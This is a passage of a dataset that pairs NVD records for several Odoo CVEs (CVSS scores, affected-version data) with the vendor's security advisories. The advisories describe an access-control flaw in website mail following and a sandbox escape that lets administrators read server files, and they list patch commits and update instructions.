No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0-ent: https://github.com/odoo/enterprise/commit/eb6799b56c0f4f55a91c59efc750abc6b9aa1436
- 14.0-ent: https://github.com/odoo/enterprise/commit/48f48647e3d9b61778450e430e889eb362d0e5d3
- 15.0-ent: https://github.com/odoo/enterprise/commit/fce7a1a52e7e30e5adcdd61d49a512f27e08f73f
| [SEC] CVE-2021-44461 - Cross-site scripting (XSS) issue in Accountin... | https://api.github.com/repos/odoo/odoo/issues/107686/comments | 0 | 2022-12-10T23:00:30Z | 2022-12-10T23:00:31Z | https://github.com/odoo/odoo/issues/107686 | 1,489,087,009 | 107,686 |
CVE-2021-44465 | 2023-04-25T19:15:09.727 | Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows authenticated attackers to subscribe to receive future notifications and comments related to arbitrary business records in the system, via crafted RPC requests. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107692"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "97EB1578-CFCC-4301-AEE7-DBBC6A92BC25",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "3451E55A-C240-40BF-AA17-E11DC5A56002",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107692 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44465](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44465)
**Affects**: Odoo 13.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44465](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44465)
**Component**: Website Mail
**Credits**: Swapnesh Shah
Improper access control in Odoo Community 13.0 and earlier and Odoo
Enterprise 13.0 and earlier allows authenticated attackers to subscribe
to receive future notifications and comments related to arbitrary
business records in the system, via crafted RPC requests.
## I. Background
The Website Mail module adds generic components to follow group discussions
on a website for external users.
## II. Problem Description
Improper content validation allowed to follow arbitrary documents where the
discussion feature is available, including ones the user does not have
access to.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: None
**CVSS3 Score**: Medium :: 5.3
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
An attacker might craft requests to follow private documents and receive future
messages. Some documents might use the list of followers as a way to determine the
access to the parent document. This could be used as a way to escalate into
reading the content the followed document through the portal.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/ef6f86dde4628b15aeb5879d268017c4a56f21fc
- 13.0-ent (Enterprise): see 13.0.
| [SEC] CVE-2021-44465 - Improper access control in Odoo Community 13.... | https://api.github.com/repos/odoo/odoo/issues/107692/comments | 0 | 2022-12-10T23:00:41Z | 2022-12-10T23:00:42Z | https://github.com/odoo/odoo/issues/107692 | 1,489,087,191 | 107,692 |
CVE-2021-44476 | 2023-04-25T19:15:09.783 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read local files on the server, including sensitive configuration files. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107684"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107684 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44476)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44476)
**Component**: Core
**Credits**: Toufik Ben Jaa
A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise
15.0 and earlier allows authenticated administrators to read local files
on the server, including sensitive configuration files.
## I. Background
Odoo includes a sandbox for interpreting dynamic business logic components,
such as the definition of workflows, automated actions, or the dynamic
expressions used within report templates.
The mechanism behind this sandbox is called 'safe eval' and keeps the system
safe while allowing advanced customizations. Its role is to execute
user-provided Odoo business logic, while preventing any undesired
effects on the data or the hosting platform - such as could be caused
by accident or by malicious users.
In order to be allowed to customize any of these dynamic business logic
components, one must be an administrator of an Odoo database, or have otherwise
received elevated privileges.
## II. Problem Description
The sandbox mechanism can be escaped and allow a malicious administrator to
read local files on the server.
Systems who host Odoo databases for untrusted users are particularly at risk,
(e.g. SaaS platforms), as they typically allow users to become administrators
of their own Odoo database. This is sufficient to exploit the vulnerability.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Privileged user account required
**CVSS3 Score**: Medium :: 6.8
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N)
A malicious administrator might be able to access sensitive files stored on the
server and read protected configuration secrets or the application source code.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/1282375d55802696d3b464c9282ff2f211529824
- 14.0: https://github.com/odoo/odoo/commit/be2c857a2e19b0a752555ab377ce5e1cb081a186
- 15.0: https://github.com/odoo/odoo/commit/affe9d8e5317f421265f24f191acdda41732a8dd
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-44476 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107684/comments | 0 | 2022-12-10T23:00:26Z | 2022-12-10T23:00:27Z | https://github.com/odoo/odoo/issues/107684 | 1,489,086,933 | 107,684 |
Subsets and Splits